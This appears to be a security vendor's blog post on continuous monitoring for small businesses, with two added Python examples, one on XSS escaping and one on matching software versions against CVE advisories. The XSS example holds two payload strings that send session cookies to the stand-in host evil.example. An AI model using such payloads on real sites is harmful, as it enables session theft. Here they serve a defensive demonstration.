Small and mid-sized businesses (SMBs) increasingly adopt new technologies to help streamline business operations and increase revenue. As they increase their reliance on interconnected cloud-based products like Software-as-a-Service (SaaS) or Infrastructure-as-a-Service (IaaS), they add new cybersecurity risks that can impact their bottom line. While a strong cybersecurity compliance program begins with a risk analysis, it ends with continuous monitoring of the data ecosystem.
Conceptually, continuous monitoring is simple. A company reviews its environment to ensure its controls remain effective. In reality, continuous monitoring places a burden on SMBs who find themselves struggling to find and retain security professionals.
Companies need to monitor their data environments continuously for two reasons: cybercriminals and compliance.
Today’s effective control can become tomorrow’s data breach. As more companies deploy anti-malware to protect themselves from ransomware and other malware, cybercriminals modify their malware so that it evades those products.
For example, in August 2018, a new ransomware called Ryuk infected several businesses. During its first few months, victims paid the attackers nearly $640,000 in ransom. More important than its existence, however, is that Ryuk was not an entirely new piece of malware: it shares code with an older ransomware family called Hermes. The attackers adapted an existing tool rather than building one from scratch.
People often assume that cybercriminals focus on previously unknown vulnerabilities, so-called zero-days. In reality, finding and weaponizing a zero-day takes time and skill, which makes it costly compared with reusing techniques that already work. Cybercriminals therefore tend to evolve their existing methods rather than create new ones.
Whether a business must comply with an industry standard or a government regulation, continuous monitoring is a core principle of both, precisely because cybercriminals continuously evolve their methods.
The reason continuous monitoring appears as a compliance requirement lies in bureaucracy. While cybercriminals change their attack methods quickly, regulations and standards go through long review cycles that leave them lagging behind current threats. Requiring continuous monitoring is intended to close that gap: it pushes organizations to catch control failures before they become breaches, and it gives auditors evidence with which to detect control deficiencies.
For most businesses, continuous monitoring poses three primary challenges.
Interconnected systems, applications, and networks make threats hard to see. For example, organizations that accept card payments typically segment the networks that handle payment card data from the rest of the business to limit the scope of the Payment Card Industry Data Security Standard (PCI DSS). Meanwhile, the networks on which they run their business collaboration tools - Google Drive, O365, Box, Dropbox - act as another entryway for cyber attacks.
More applications mean more places where the organization is at risk. For example, many applications ship with default credentials such as “admin”. These credentials are not secure, yet IT departments and users frequently never change them. As the number of applications grows, it becomes harder to verify that every default credential has been replaced and to monitor authentication activity and traffic across the network.
Taking this further, each application added to the network also brings its own patch stream. The security patch updates for each application and operating system need to be tracked. However, not every update matters equally: some patches only add features or fix usability bugs, while others close security holes, and the two have to be told apart so that security fixes are applied first.
Prioritizing alerts burdens SMBs that have limited IT staff to respond to and remediate threats. Sifting through alerts to find the ones that matter takes time, yet trying to fix every problem slows down systems, networks, and staff. Finding the balance between high-risk and low-risk alerts therefore becomes a strategic business need.
Embedded within both the visibility and prioritization issues lies the risk of human error. Manual monitoring becomes untenable. For SMBs whose IT department may consist solely of a single person, rushing monitoring activities while responding to help desk tickets can lead to mistakes in prioritizing or reviewing alerts.
Adding new technologies can increase risk, but the right ones can also help mitigate it. Automated tools bring a multitude of alerts together in a single location and prioritize them for your staff.
Protecting a network requires knowing how it looks from the outside. Automated tools scan networks from the internet to detect exposed services, misconfigured firewalls, and other control failures.
Many SaaS applications are accessed through a web browser. Unfortunately, the same threats that plague consumer websites also affect these applications. Cross-site scripting (XSS), one of the most common web vulnerabilities, lets an attacker run script of their choosing in a victim’s browser in the context of the vulnerable site, where it can steal session cookies or capture login credentials. Thus, a web application that lets customers log in to a company’s account, or a web application the company itself uses, can lead to a data breach if it is misconfigured or fails to handle user input safely. Automated tools scan web applications for weaknesses that leave the organization open to these kinds of attacks.
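To make the XSS point concrete, here is an added example (not code from the original page or from Zeguro) showing the unsafe rendering pattern, a tag blacklist that is commonly mistaken for a fix, and the escaped form that actually works, plus the HttpOnly cookie flag that limits what a successful script can steal. The greeting template, the attacker payloads and the evil.example host are all constructed for illustration.

```python
"""Reflected XSS: unsafe HTML rendering beside the escaped form (added example)."""
import html
import re

# Constructed attacker inputs. If either is rendered as markup, the victim's browser
# executes it in the origin of the vulnerable site and can read document.cookie.
SCRIPT_PAYLOAD = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
# This one carries no <script> tag at all, so a tag blacklist never sees it.
EVENT_PAYLOAD = '<img src=x onerror="location=\'https://evil.example/?c=\'+document.cookie">'


def render_vulnerable(username: str) -> str:
    """The bug: untrusted input interpolated straight into HTML."""
    return f"<p>Welcome back, {username}!</p>"


def render_blacklist(username: str) -> str:
    """A common but inadequate fix: strip <script>...</script> and hope."""
    cleaned = re.sub(r"(?is)<script.*?>.*?</script>", "", username)
    return f"<p>Welcome back, {cleaned}!</p>"


def render_safe(username: str) -> str:
    """The fix: escape for the HTML text context, so input can only render as text."""
    return f"<p>Welcome back, {html.escape(username, quote=True)}!</p>"


def session_cookie_header(session_id: str) -> str:
    """Defense in depth: HttpOnly keeps the cookie out of document.cookie even if
    a script does get through; Secure and SameSite narrow where it is sent."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


_TAG_RE = re.compile(r"<\s*[a-zA-Z][^>]*>")


def injected_tags(markup: str) -> list[str]:
    """Opening tags in the output other than the template's own <p>: anything
    here came from the user and would be interpreted by a browser."""
    return [t for t in (m.lower() for m in _TAG_RE.findall(markup)) if t != "<p>"]


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("blacklist", render_blacklist),
                         ("escaped", render_safe)):
        for payload in (SCRIPT_PAYLOAD, EVENT_PAYLOAD):
            print(f"{name:10s} injected={injected_tags(render(payload))}")
```

The blacklist version neutralizes the first payload and still lets the `onerror` handler through, which is why scanners report input that reaches the page unescaped rather than input that merely contains the word "script".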
Automated tools also scan systems, networks, applications, and devices for publicly known vulnerabilities, which are catalogued with CVE (Common Vulnerabilities and Exposures) identifiers. When a vendor such as Microsoft or Apple confirms a weakness in its software, it publishes an advisory and a patch, and the flaw is assigned a CVE ID. That disclosure makes the vulnerability public, and attackers study the advisory and the patch to work out how to exploit systems that have not yet applied it. Automated tools scan for CVEs to confirm that companies are applying their security patches in a timely manner.
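The following added example (not Zeguro’s code) shows the core of what a CVE scanner does for the patch-tracking problem described above: compare an inventory of installed software versions against a list of advisories and rank the gaps by severity, and tell security patches from feature patches by whether the release note cites a CVE ID. The product names, hosts, version numbers and the CVE-0000-xxxx identifiers are constructed placeholders, not real products or real CVEs.

```python
"""Match an installed-software inventory against security advisories (added example)."""
import re
from dataclasses import dataclass

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
# Shape of a CVE identifier: "CVE-" + year + "-" + at least four digits.
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b")


@dataclass(frozen=True)
class Advisory:
    cve: str       # identifier (constructed placeholders below, not real CVEs)
    product: str
    fixed_in: str  # first version that carries the fix
    severity: str


@dataclass(frozen=True)
class Installed:
    host: str
    product: str
    version: str


def parse_version(v: str) -> tuple:
    """'7.4.0-r1' -> ((0,7),(0,4),(0,0),(1,'r1')). Numeric parts compare as ints
    and sort before text parts, so mixed versions never raise on comparison.
    A shorter version sorts before a longer one with the same prefix ('7.4' < '7.4.0')."""
    parts = re.split(r"[.\-]", v.strip())
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)


def is_vulnerable(item: Installed, adv: Advisory) -> bool:
    """Installed version is below the first fixed version of the same product."""
    return item.product == adv.product and parse_version(item.version) < parse_version(adv.fixed_in)


def find_unpatched(inventory, advisories):
    """All (installed, advisory) pairs still exposed, most severe first, then by host."""
    findings = [(item, adv) for item in inventory for adv in advisories if is_vulnerable(item, adv)]
    findings.sort(key=lambda f: (SEVERITY_RANK.get(f[1].severity, 99), f[0].host, f[1].cve))
    return findings


def is_security_patch(release_note: str) -> bool:
    """Crude but useful triage: an update whose notes cite a CVE is a security fix."""
    return bool(CVE_RE.search(release_note))


# Constructed sample data: placeholder products, hosts and CVE IDs.
ADVISORIES = [
    Advisory("CVE-0000-0001", "webmail", "2.8.1", "critical"),
    Advisory("CVE-0000-0002", "fileshare", "10.2.0", "high"),
    Advisory("CVE-0000-0003", "webmail", "2.7.4", "medium"),
]
INVENTORY = [
    Installed("hr-laptop-01", "webmail", "2.7.3"),
    Installed("hr-laptop-01", "fileshare", "10.2.0"),
    Installed("fin-server-01", "fileshare", "10.1.9"),
    Installed("fin-server-01", "webmail", "2.8.1"),
]

if __name__ == "__main__":
    for item, adv in find_unpatched(INVENTORY, ADVISORIES):
        print(f"{adv.severity:8s} {item.host:14s} {item.product} {item.version} "
              f"-> {adv.cve} fixed in {adv.fixed_in}")
```

Real scanners replace the hand-written advisory list with vendor or NVD feeds and use each ecosystem's own version-ordering rules, but the check itself, "is the installed version below the fixed version", is what the scan amounts to.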
At Zeguro, we understand the struggles SMBs face. A security-first approach to cybersecurity starts with risk and ends with ongoing security monitoring. We provide metrics that help identify risks, create policies, train employees, and continuously monitor control effectiveness. We further protect businesses by directing them to the cyber insurance policy that fits their needs. Get early access to our Cyber Safety platform by signing up now.